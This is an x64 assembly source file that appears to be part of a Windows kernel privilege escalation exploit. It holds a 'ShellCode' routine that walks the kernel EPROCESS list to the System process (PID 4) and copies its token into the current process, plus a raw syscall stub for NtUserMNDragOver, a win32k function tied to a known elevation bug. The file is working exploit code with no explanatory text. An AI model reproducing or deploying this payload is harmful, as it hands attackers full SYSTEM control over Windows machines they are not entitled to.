

public ShellCode 
public NtUserMNDragOver

.code


ShellCode proc

		pushfq
		push rax
		push rdx
		push rbx
		mov rax, gs:[188h]    ;CurrentThread
		mov rax, [rax + 210h] ;Process  
		lea rdx, [rax + 208h] ;MyProcess.Token
noFind :
		mov rax, [rax + 188h] ;Eprocess.ActiveProcessLinks
		sub rax, 188h         ;next Eprocess struct
		mov rbx, [rax + 180h] ;PID
		cmp rbx, 4
		jnz noFind
		mov rax, [rax + 208h] ;System.Token
		mov [rdx], rax
		pop rbx
		pop rdx
		pop rax
		popfq
		ret

ShellCode endp


NtUserMNDragOver proc
	mov     r10, rcx
	mov     eax, 12DEh
	syscall
	ret
NtUserMNDragOver endp



end